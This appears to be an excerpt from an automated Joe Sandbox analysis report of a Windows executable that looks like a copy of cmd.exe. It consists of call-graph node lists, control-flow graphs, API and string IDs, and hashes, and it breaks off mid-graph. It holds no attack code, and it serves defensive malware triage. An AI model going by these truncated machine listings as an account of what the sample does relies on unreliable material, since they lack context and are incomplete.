18619->18009 18620 7ff789bdec38 18621->18617 18621->18620 18623 7ff789bd4a14 5 API calls 18622->18623 18624 7ff789bc6ae8 18623->18624 18625 7ff789bc6b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 18624->18625 18627 7ff789bcc486 18626->18627 18628 7ff789bcc4c9 18626->18628 18629 7ff789bcc48e wcschr 18627->18629 18633 7ff789bcc161 18627->18633 18631 7ff789bcff70 2 API calls 18628->18631 18628->18633 18630 7ff789bcc4ef 18629->18630 18629->18633 18632 7ff789bccd90 166 API calls 18630->18632 18631->18633 18639 7ff789bcc4f9 18632->18639 18633->17008 18633->17011 18634 7ff789bcc5bd 18635 7ff789bcc541 18634->18635 18638 7ff789bcb6b0 170 API calls 18634->18638 18635->18633 18637 7ff789bcff70 2 API calls 18635->18637 18636 7ff789bcd840 178 API calls 18636->18639 18637->18633 18638->18635 18639->18633 18639->18634 18639->18635 18639->18636 18640->17056 18642 7ff789bd3bcf 18641->18642 18644 7ff789bd3bfe 18641->18644 18643 7ff789bd3bdc wcschr 18642->18643 18642->18644 18643->18642 18643->18644 18644->17107 18646 7ff789bd8f80 7 API calls 18645->18646 18647 7ff789bd296b 18646->18647 18647->17107 18649 7ff789bd2f97 18648->18649 18650 7ff789bd2f2a 18648->18650 18649->18650 18652 7ff789bd2f9c wcschr 18649->18652 18667 7ff789bd823c FindFirstFileExW 18650->18667 18653 7ff789bd2fb6 wcschr 18652->18653 18655 7ff789bd2f5a 18652->18655 18653->18650 18653->18655 18658 7ff789bd8f80 7 API calls 18655->18658 18661 7ff789bde4ec 18655->18661 18656 7ff789bd3a0c 2 API calls 18657 7ff789bd2fe0 18656->18657 18657->18655 18659 7ff789bd2fe9 wcsrchr 18657->18659 18660 7ff789bd2f83 18658->18660 18659->18655 18660->17107 18663 7ff789bcb6b0 170 API calls 18662->18663 18664 7ff789bcaf82 18663->18664 18664->17107 18665 7ff789bcff70 2 API calls 18664->18665 18666 7ff789bdbf6e 18665->18666 18666->17107 18668 7ff789bd829d GetLastError 18667->18668 18670 7ff789bd82cd 18667->18670 18669 7ff789bd2f56 18668->18669 18669->18655 18669->18656 18671 7ff789bd8365 FindNextFileW 18670->18671 18672 7ff789bd82e5 18670->18672 18673 7ff789bd83d0 FindClose 18671->18673 18674 7ff789bd837d 18671->18674 18676 7ff789bd8332 GetProcessHeap HeapAlloc 18672->18676 18677 7ff789bd8302 18672->18677 18678 7ff789bd8310 18672->18678 18673->18672 18674->18670 18675 7ff789bd8386 18674->18675 18675->18668 18676->18678 18677->18678 18679 7ff789bd838b GetProcessHeap HeapReAlloc 18677->18679 18678->18668 18678->18669 18679->18678 18680 7ff789be50f8 GetLastError FindClose 18679->18680 18680->18669 18682 7ff789be4621 18681->18682 18683 7ff789bc72de 18681->18683 18685 7ff789be47e0 18682->18685 18686 7ff789be447b longjmp 18682->18686 18689 7ff789be475e 18682->18689 18690 7ff789be4639 18682->18690 18684 7ff789bc72eb 18683->18684 18693 7ff789be4530 18683->18693 18694 7ff789be4467 18683->18694 18742 7ff789bc7348 18684->18742 18688 7ff789bc7348 168 API calls 18685->18688 18691 7ff789be4492 18686->18691 18741 7ff789be4524 18688->18741 18701 7ff789bc7348 168 API calls 18689->18701 18695 7ff789be4695 18690->18695 18696 7ff789be463e 18690->18696 18697 7ff789bc7348 168 API calls 18691->18697 18698 7ff789bc7348 168 API calls 18693->18698 18694->18684 18694->18691 18700 7ff789be4475 18694->18700 18706 7ff789bc73d4 168 API calls 18695->18706 18696->18686 18714 7ff789be4654 18696->18714 18702 7ff789be44a8 18697->18702 18725 7ff789be4549 18698->18725 18699 7ff789bc7315 18757 7ff789bc73d4 18699->18757 18700->18686 18700->18695 18701->18685 18715 7ff789be44e2 18702->18715 18719 7ff789bc7348 168 API calls 18702->18719 18703 7ff789bc7348 168 API calls 18703->18699 18704 7ff789bc72b0 168 API calls 18708 7ff789be480e 18704->18708 18727 7ff789be469a 18706->18727 18707 7ff789be45b2 18709 7ff789bc7348 168 API calls 18707->18709 18708->17149 18713 7ff789be45c7 18709->18713 18710 7ff789be455e 18710->18707 18717 7ff789bc7348 168 API calls 18710->18717 18711 7ff789be46e1 18712 7ff789bc72b0 168 API calls 18711->18712 18721 7ff789be4738 18712->18721 18718 7ff789bc7348 168 API calls 18713->18718 18716 7ff789bc7348 168 API calls 18714->18716 18720 7ff789bc72b0 168 API calls 18715->18720 18722 7ff789bc7323 18716->18722 18717->18707 18724 7ff789be45db 18718->18724 18719->18715 18726 7ff789be44f1 18720->18726 18723 7ff789bc7348 168 API calls 18721->18723 18722->17149 18723->18741 18728 7ff789bc7348 168 API calls 18724->18728 18725->18707 18725->18710 18730 7ff789bc7348 168 API calls 18725->18730 18729 7ff789bc72b0 168 API calls 18726->18729 18727->18711 18731 7ff789be46c7 18727->18731 18732 7ff789be46ea 18727->18732 18733 7ff789be45ec 18728->18733 18734 7ff789be4503 18729->18734 18730->18710 18731->18711 18738 7ff789bc7348 168 API calls 18731->18738 18735 7ff789bc7348 168 API calls 18732->18735 18736 7ff789bc7348 168 API calls 18733->18736 18734->18722 18737 7ff789bc7348 168 API calls 18734->18737 18735->18711 18739 7ff789be4600 18736->18739 18737->18741 18738->18711 18740 7ff789bc7348 168 API calls 18739->18740 18740->18741 18741->18704 18741->18722 18743 7ff789bc735d 18742->18743 18744 7ff789bc3278 166 API calls 18743->18744 18746 7ff789be4838 18743->18746 18756 7ff789bc73ab 18743->18756 18745 7ff789be4820 longjmp 18744->18745 18745->18746 18747 7ff789bc3278 166 API calls 18746->18747 18748 7ff789be4844 longjmp 18747->18748 18749 7ff789be485a 18748->18749 18750 7ff789bc7348 166 API calls 18749->18750 18751 7ff789be487b 18750->18751 18752 7ff789bc7348 166 API calls 18751->18752 18753 7ff789be48ad 18752->18753 18754 7ff789bc7348 166 API calls 18753->18754 18755 7ff789bc72ff 18754->18755 18755->18699 18755->18703 18758 7ff789bc7401 18757->18758 18759 7ff789be485a 18757->18759 18758->18722 18760 7ff789bc7348 168 API calls 18759->18760 18761 7ff789be487b 18760->18761 18762 7ff789bc7348 168 API calls 18761->18762 18763 7ff789be48ad 18762->18763 18764 7ff789bc7348 168 API calls 18763->18764 18765 7ff789be48be 18764->18765 18765->18722 16742 7ff789bd8d80 16743 7ff789bd8da4 16742->16743 16744 7ff789bd8db6 16743->16744 16745 7ff789bd8dbf Sleep 16743->16745 16746 7ff789bd8ddb _amsg_exit 16744->16746 16748 7ff789bd8de7 16744->16748 16745->16743 16746->16748 16747 7ff789bd8e56 _initterm 16752 7ff789bd8e73 _IsNonwritableInCurrentImage 16747->16752 16748->16747 16749 7ff789bd8e3c 16748->16749 16748->16752 16756 7ff789bd37d8 GetCurrentThreadId OpenThread 16752->16756 16789 7ff789bd04f4 16756->16789 16758 7ff789bd3839 HeapSetInformation RegOpenKeyExW 16759 7ff789bd388d 16758->16759 16760 7ff789bde9f8 RegQueryValueExW RegCloseKey 16758->16760 16761 7ff789bd5920 VirtualQuery VirtualQuery 16759->16761 16763 7ff789bdea41 GetThreadLocale 16760->16763 16762 7ff789bd38ab GetConsoleOutputCP GetCPInfo 16761->16762 16762->16763 16764 7ff789bd38f1 memset 16762->16764 16771 7ff789bd3919 16763->16771 16764->16771 16765 7ff789bd4d5c 391 API calls 16765->16771 16766 7ff789bdeb27 _setjmp 16766->16771 16767 7ff789bd3948 _setjmp 16767->16771 16768 7ff789be8530 370 API calls 16768->16771 16769 7ff789bc3240 166 API calls 16769->16771 16770 7ff789bd01b8 6 API calls 16770->16771 16771->16760 16771->16765 16771->16766 16771->16767 16771->16768 16771->16769 16771->16770 16772 7ff789bd4c1c 166 API calls 16771->16772 16773 7ff789bdeb71 _setmode 16771->16773 16774 7ff789bd86f0 182 API calls 16771->16774 16775 7ff789bd0580 12 API calls 16771->16775 16778 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 16771->16778 16779 7ff789bcbe00 647 API calls 16771->16779 16780 7ff789bcdf60 481 API calls 16771->16780 16781 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 16771->16781 16772->16771 16773->16771 16774->16771 16776 7ff789bd398b GetConsoleOutputCP GetCPInfo 16775->16776 16777 7ff789bd04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16776->16777 16777->16771 16778->16771 16779->16771 16780->16771 16782 7ff789bdebbe GetConsoleOutputCP GetCPInfo 16781->16782 16783 7ff789bd04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16782->16783 16784 7ff789bdebe6 16783->16784 16785 7ff789bcbe00 647 API calls 16784->16785 16786 7ff789bd0580 12 API calls 16784->16786 16785->16784 16787 7ff789bdebfc GetConsoleOutputCP GetCPInfo 16786->16787 16788 7ff789bd04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16787->16788 16788->16771 16791 7ff789bd0504 16789->16791 16790 7ff789bd051e GetModuleHandleW 16790->16791 16791->16790 16792 7ff789bd054d GetProcAddress 16791->16792 16793 7ff789bd056c SetThreadLocale 16791->16793 16792->16791

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF789BD0A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                                    • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                                    • API String ID: 3305344409-4288247545
                                                                                                                    • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                                                                                                    • Instruction ID: d48eca7e991860eda796c8a2fffa1c179bb5fca4273eef60afd397f036cc33b0
                                                                                                                    • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                                                                                                    • Instruction Fuzzy Hash: AD42C521B0C68A85FA54BF6198182B9ABB1FF85F96FA44134D95E47BD4DF3CE044C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCAA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 216 7ff789bcaa54-7ff789bcaa98 call 7ff789bccd90 219 7ff789bcaa9e 216->219 220 7ff789bdbf5a-7ff789bdbf70 call 7ff789bd4c1c call 7ff789bcff70 216->220 221 7ff789bcaaa5-7ff789bcaaa8 219->221 223 7ff789bcacde-7ff789bcad00 221->223 224 7ff789bcaaae-7ff789bcaac8 wcschr 221->224 229 7ff789bcad06 223->229 224->223 226 7ff789bcaace-7ff789bcaae9 towlower 224->226 226->223 228 7ff789bcaaef-7ff789bcaaf3 226->228 231 7ff789bdbeb7-7ff789bdbec4 call 7ff789beeaf0 228->231 232 7ff789bcaaf9-7ff789bcaafd 228->232 233 7ff789bcad0d-7ff789bcad1f 229->233 243 7ff789bdbf43-7ff789bdbf59 call 7ff789bd4c1c 231->243 244 7ff789bdbec6-7ff789bdbed8 call 7ff789bc3240 231->244 235 7ff789bcab03-7ff789bcab07 232->235 236 7ff789bdbbcf 232->236 237 7ff789bcad22-7ff789bcad2a call 7ff789bd13e0 233->237 239 7ff789bcab7d-7ff789bcab81 235->239 240 7ff789bcab09-7ff789bcab0d 235->240 245 7ff789bdbbde 236->245 237->221 246 7ff789bdbe63 239->246 247 7ff789bcab87-7ff789bcab95 239->247 240->246 248 7ff789bcab13-7ff789bcab17 240->248 243->220 244->243 261 7ff789bdbeda-7ff789bdbee9 call 7ff789bc3240 244->261 256 7ff789bdbbea-7ff789bdbbec 245->256 259 7ff789bdbe72-7ff789bdbe88 call 7ff789bc3278 call 7ff789bd4c1c 246->259 252 7ff789bcab98-7ff789bcaba0 247->252 248->239 253 7ff789bcab19-7ff789bcab1d 248->253 252->252 257 7ff789bcaba2-7ff789bcabb3 call 7ff789bccd90 252->257 253->245 258 7ff789bcab23-7ff789bcab27 253->258 266 7ff789bdbbf8-7ff789bdbc01 256->266 257->220 272 7ff789bcabb9-7ff789bcabde call 7ff789bd13e0 call 7ff789bd33a8 257->272 258->256 263 7ff789bcab2d-7ff789bcab31 258->263 281 7ff789bdbe89-7ff789bdbe8c 259->281 276 7ff789bdbef3-7ff789bdbef9 261->276 277 7ff789bdbeeb-7ff789bdbef1 261->277 263->229 268 7ff789bcab37-7ff789bcab3b 263->268 266->233 268->266 269 7ff789bcab41-7ff789bcab45 268->269 273 7ff789bdbc06-7ff789bdbc2a call 7ff789bd13e0 269->273 274 7ff789bcab4b-7ff789bcab4f 269->274 305 7ff789bcabe4-7ff789bcabe7 272->305 306 7ff789bcac75 272->306 298 7ff789bdbc2c-7ff789bdbc4c _wcsnicmp 273->298 299 7ff789bdbc5a-7ff789bdbc61 273->299 279 7ff789bcab55-7ff789bcab78 call 7ff789bd13e0 274->279 280 7ff789bcad2f-7ff789bcad33 274->280 276->243 282 7ff789bdbefb-7ff789bdbf0d call 7ff789bc3240 276->282 277->243 277->276 279->221 290 7ff789bdbc66-7ff789bdbc8a call 7ff789bd13e0 280->290 291 7ff789bcad39-7ff789bcad3d 280->291 286 7ff789bdbe92-7ff789bdbeaa call 7ff789bc3278 call 7ff789bd4c1c 281->286 287 7ff789bcacbe 281->287 282->243 312 7ff789bdbf0f-7ff789bdbf21 call 7ff789bc3240 282->312 340 7ff789bdbeab-7ff789bdbeb6 call 7ff789bd4c1c 286->340 295 7ff789bcacc0-7ff789bcacc7 287->295 319 7ff789bdbcc4-7ff789bdbcdc 290->319 320 7ff789bdbc8c-7ff789bdbcaa _wcsnicmp 290->320 300 7ff789bcad43-7ff789bcad49 291->300 301 7ff789bdbcde-7ff789bdbd02 call 7ff789bd13e0 291->301 295->295 309 7ff789bcacc9-7ff789bcacda 295->309 298->299 313 7ff789bdbc4e-7ff789bdbc55 298->313 307 7ff789bdbd31-7ff789bdbd4f _wcsnicmp 299->307 303 7ff789bcad4f-7ff789bcad68 300->303 304 7ff789bdbd5e-7ff789bdbd65 300->304 329 7ff789bdbd04-7ff789bdbd24 _wcsnicmp 301->329 330 7ff789bdbd2a 301->330 316 7ff789bcad6d-7ff789bcad70 303->316 317 7ff789bcad6a 303->317 304->303 314 7ff789bdbd6b-7ff789bdbd73 304->314 305->287 318 7ff789bcabed-7ff789bcac0b call 7ff789bccd90 * 2 305->318 323 7ff789bcac77-7ff789bcac7f 306->323 325 7ff789bdbd55 307->325 326 7ff789bdbbc2-7ff789bdbbca 307->326 309->223 312->243 343 7ff789bdbf23-7ff789bdbf35 call 7ff789bc3240 312->343 315 7ff789bdbbb3-7ff789bdbbb7 313->315 331 7ff789bdbe4a-7ff789bdbe5e 314->331 332 7ff789bdbd79-7ff789bdbd8b iswxdigit 314->332 333 7ff789bdbbba-7ff789bdbbbd call 7ff789bd13e0 315->333 316->237 317->316 318->340 358 7ff789bcac11-7ff789bcac14 318->358 319->307 320->319 327 7ff789bdbcac-7ff789bdbcbf 320->327 323->287 335 7ff789bcac81-7ff789bcac85 323->335 325->304 326->221 327->315 329->330 341 7ff789bdbbac 329->341 330->307 331->333 332->331 337 7ff789bdbd91-7ff789bdbda3 iswxdigit 332->337 333->326 342 7ff789bcac88-7ff789bcac8f 335->342 337->331 345 7ff789bdbda9-7ff789bdbdbb iswxdigit 337->345 340->231 341->315 342->342 347 7ff789bcac91-7ff789bcac94 342->347 343->243 355 7ff789bdbf37-7ff789bdbf3e call 7ff789bc3240 343->355 345->331 351 7ff789bdbdc1-7ff789bdbdd7 iswdigit 345->351 347->287 349 7ff789bcac96-7ff789bcacaa wcsrchr 347->349 349->287 354 7ff789bcacac-7ff789bcacb9 call 7ff789bd1300 349->354 356 7ff789bdbddf-7ff789bdbdeb towlower 351->356 357 7ff789bdbdd9-7ff789bdbddd 351->357 354->287 355->243 361 7ff789bdbdee-7ff789bdbe0f iswdigit 356->361 357->361 358->340 362 7ff789bcac1a-7ff789bcac33 memset 358->362 363 7ff789bdbe11-7ff789bdbe15 361->363 364 7ff789bdbe17-7ff789bdbe23 towlower 361->364 362->306 365 7ff789bcac35-7ff789bcac4b wcschr 362->365 366 7ff789bdbe26-7ff789bdbe45 call 7ff789bd13e0 363->366 364->366 365->306 367 7ff789bcac4d-7ff789bcac54 365->367 366->331 368 7ff789bcad72-7ff789bcad91 wcschr 367->368 369 7ff789bcac5a-7ff789bcac6f wcschr 367->369 371 7ff789bcaf03-7ff789bcaf07 368->371 372 7ff789bcad97-7ff789bcadac wcschr 368->372 369->306 369->368 371->306 372->371 373 7ff789bcadb2-7ff789bcadc7 wcschr 372->373 373->371 374 7ff789bcadcd-7ff789bcade2 wcschr 373->374 374->371 375 7ff789bcade8-7ff789bcadfd wcschr 374->375 375->371 376 7ff789bcae03-7ff789bcae18 wcschr 375->376 376->371 377 7ff789bcae1e-7ff789bcae21 376->377 378 7ff789bcae24-7ff789bcae27 377->378 378->371 379 7ff789bcae2d-7ff789bcae40 iswspace 378->379 380 7ff789bcae42-7ff789bcae49 379->380 381 7ff789bcae4b-7ff789bcae5e 379->381 380->378 382 7ff789bcae66-7ff789bcae6d 381->382 382->382 383 7ff789bcae6f-7ff789bcae77 382->383 383->259 384 7ff789bcae7d-7ff789bcae97 call 7ff789bd13e0 383->384 387 7ff789bcae9a-7ff789bcaea4 384->387 388 7ff789bcaea6-7ff789bcaead 387->388 389 7ff789bcaebc-7ff789bcaef8 call 7ff789bd0a6c call 7ff789bcff70 * 2 387->389 388->389 390 7ff789bcaeaf-7ff789bcaeba 388->390 389->323 397 7ff789bcaefe 389->397 390->387 390->389 397->281
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                                                                                                    • String ID: :$:$:$:ON$OFF
                                                                                                                    • API String ID: 4076514806-467788257
                                                                                                                    • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                    • Instruction ID: 4969cf3e28070cadd62036cb1f5d724d4f6e4ec7f615cebaf54532959e42d219
                                                                                                                    • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                    • Instruction Fuzzy Hash: 9122A321A0865B86EB64BF259514279EEB1FF85F97FE88135CA0E47794EF3CA440C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD51EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 398 7ff789bd51ec-7ff789bd5248 call 7ff789bd5508 GetLocaleInfoW 401 7ff789bdef32-7ff789bdef3c 398->401 402 7ff789bd524e-7ff789bd5272 GetLocaleInfoW 398->402 403 7ff789bdef3f-7ff789bdef49 401->403 404 7ff789bd5274-7ff789bd527a 402->404 405 7ff789bd5295-7ff789bd52b9 GetLocaleInfoW 402->405 406 7ff789bdef61-7ff789bdef6c 403->406 407 7ff789bdef4b-7ff789bdef52 403->407 408 7ff789bd5280-7ff789bd5286 404->408 409 7ff789bd54f7-7ff789bd54f9 404->409 410 7ff789bd52bb-7ff789bd52c3 405->410 411 7ff789bd52de-7ff789bd5305 GetLocaleInfoW 405->411 414 7ff789bdef75-7ff789bdef78 406->414 407->406 412 7ff789bdef54-7ff789bdef5f 407->412 408->409 413 7ff789bd528c-7ff789bd528f 408->413 409->401 410->414 415 7ff789bd52c9-7ff789bd52d7 410->415 416 7ff789bd5321-7ff789bd5343 GetLocaleInfoW 411->416 417 7ff789bd5307-7ff789bd531b 411->417 412->403 412->406 413->405 420 7ff789bdef7a-7ff789bdef7d 414->420 421 7ff789bdef99-7ff789bdefa3 414->421 415->411 418 7ff789bdefaf-7ff789bdefb9 416->418 419 7ff789bd5349-7ff789bd536e GetLocaleInfoW 416->419 417->416 425 7ff789bdefbc-7ff789bdefc6 418->425 422 7ff789bd5374-7ff789bd5396 GetLocaleInfoW 419->422 423 7ff789bdeff2-7ff789bdeffc 419->423 420->411 424 7ff789bdef83-7ff789bdef8d 420->424 421->418 427 7ff789bdf035-7ff789bdf03f 422->427 428 7ff789bd539c-7ff789bd53be GetLocaleInfoW 422->428 426 7ff789bdefff-7ff789bdf009 423->426 424->421 429 7ff789bdefde-7ff789bdefe9 425->429 430 7ff789bdefc8-7ff789bdefcf 425->430 431 7ff789bdf021-7ff789bdf02c 426->431 432 7ff789bdf00b-7ff789bdf012 426->432 435 7ff789bdf042-7ff789bdf04c 427->435 433 7ff789bd53c4-7ff789bd53e6 GetLocaleInfoW 428->433 434 7ff789bdf078-7ff789bdf082 428->434 429->423 430->429 436 7ff789bdefd1-7ff789bdefdc 430->436 431->427 432->431 437 7ff789bdf014-7ff789bdf01f 432->437 438 7ff789bdf0bb-7ff789bdf0c5 433->438 439 7ff789bd53ec-7ff789bd540e GetLocaleInfoW 433->439 442 7ff789bdf085-7ff789bdf08f 434->442 440 7ff789bdf064-7ff789bdf06f 435->440 441 7ff789bdf04e-7ff789bdf055 435->441 436->425 436->429 437->426 437->431 443 7ff789bdf0c8-7ff789bdf0d2 438->443 444 7ff789bd5414-7ff789bd5436 GetLocaleInfoW 439->444 445 7ff789bdf0fe-7ff789bdf108 439->445 440->434 441->440 446 7ff789bdf057-7ff789bdf062 441->446 447 7ff789bdf091-7ff789bdf098 442->447 448 7ff789bdf0a7-7ff789bdf0b2 442->448 450 7ff789bdf0d4-7ff789bdf0db 443->450 451 7ff789bdf0ea-7ff789bdf0f5 443->451 452 7ff789bdf141-7ff789bdf14b 444->452 453 7ff789bd543c-7ff789bd545e GetLocaleInfoW 444->453 454 7ff789bdf10b-7ff789bdf115 445->454 446->435 446->440 447->448 449 7ff789bdf09a-7ff789bdf0a5 447->449 448->438 449->442 449->448 450->451 456 7ff789bdf0dd-7ff789bdf0e8 450->456 451->445 455 7ff789bdf14e-7ff789bdf158 452->455 457 7ff789bdf184-7ff789bdf18b 453->457 458 7ff789bd5464-7ff789bd5486 GetLocaleInfoW 453->458 459 7ff789bdf12d-7ff789bdf138 454->459 460 7ff789bdf117-7ff789bdf11e 454->460 461 7ff789bdf170-7ff789bdf17b 455->461 462 7ff789bdf15a-7ff789bdf161 455->462 456->443 456->451 463 7ff789bdf18e-7ff789bdf198 457->463 464 7ff789bdf1c4-7ff789bdf1ce 458->464 465 7ff789bd548c-7ff789bd54ae GetLocaleInfoW 458->465 459->452 460->459 466 7ff789bdf120-7ff789bdf12b 460->466 461->457 462->461 467 7ff789bdf163-7ff789bdf16e 462->467 468 7ff789bdf1b0-7ff789bdf1bb 463->468 469 7ff789bdf19a-7ff789bdf1a1 463->469 472 7ff789bdf1d1-7ff789bdf1db 464->472 470 7ff789bd54b4-7ff789bd54f5 setlocale call 7ff789bd8f80 465->470 471 7ff789bdf207-7ff789bdf20e 465->471 466->454 466->459 467->455 467->461 468->464 469->468 474 7ff789bdf1a3-7ff789bdf1ae 469->474 473 7ff789bdf211-7ff789bdf21b 471->473 476 7ff789bdf1f3-7ff789bdf1fe 472->476 477 7ff789bdf1dd-7ff789bdf1e4 472->477 478 7ff789bdf233-7ff789bdf23e 473->478 479 7ff789bdf21d-7ff789bdf224 473->479 474->463 474->468 476->471 477->476 481 7ff789bdf1e6-7ff789bdf1f1 477->481 479->478 482 7ff789bdf226-7ff789bdf231 479->482 481->472 481->476 482->473 482->478
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale$DefaultLangUsersetlocale
                                                                                                                    • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                    • API String ID: 2492766124-2236139042
                                                                                                                    • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                    • Instruction ID: ae2202a0480b99ed464ef0b5070acc91f0aabaf930c9c4a830528453e193ca86
                                                                                                                    • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                    • Instruction Fuzzy Hash: BCF16C61B1874A85EF21AF25E9182B9AAB4BF45F82FE44136CA0D47794EF3CE505C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 483 7ff789bd4224-7ff789bd42a5 InitializeProcThreadAttributeList 484 7ff789bdecd4-7ff789bdecee GetLastError call 7ff789be9eec 483->484 485 7ff789bd42ab-7ff789bd42e5 UpdateProcThreadAttribute 483->485 493 7ff789bded1e 484->493 487 7ff789bdecf0-7ff789bded19 GetLastError call 7ff789be9eec DeleteProcThreadAttributeList 485->487 488 7ff789bd42eb-7ff789bd43c6 memset * 2 GetStartupInfoW call 7ff789bd3a90 call 7ff789bcb900 485->488 487->493 497 7ff789bd43cc-7ff789bd43d3 488->497 498 7ff789bd4638-7ff789bd4644 _local_unwind 488->498 499 7ff789bd4649-7ff789bd4650 497->499 500 7ff789bd43d9-7ff789bd43dc 497->500 498->499 499->500 503 7ff789bd4656-7ff789bd465d 499->503 501 7ff789bd4415-7ff789bd4424 call 7ff789bd5a68 500->501 502 7ff789bd43de-7ff789bd43f5 wcsrchr 500->502 510 7ff789bd4589-7ff789bd4590 501->510 511 7ff789bd442a-7ff789bd4486 CreateProcessW 501->511 502->501 504 7ff789bd43f7-7ff789bd440f lstrcmpW 502->504 503->501 506 7ff789bd4663 503->506 504->501 507 7ff789bd4668-7ff789bd466d call 7ff789be9044 504->507 506->500 507->501 510->511 512 7ff789bd4596-7ff789bd45fa CreateProcessAsUserW 510->512 514 7ff789bd448b-7ff789bd448f 511->514 512->514 515 7ff789bd4495-7ff789bd44c7 CloseHandle call 7ff789bd498c 514->515 516 7ff789bd4672-7ff789bd4682 GetLastError 514->516 519 7ff789bd468d-7ff789bd4694 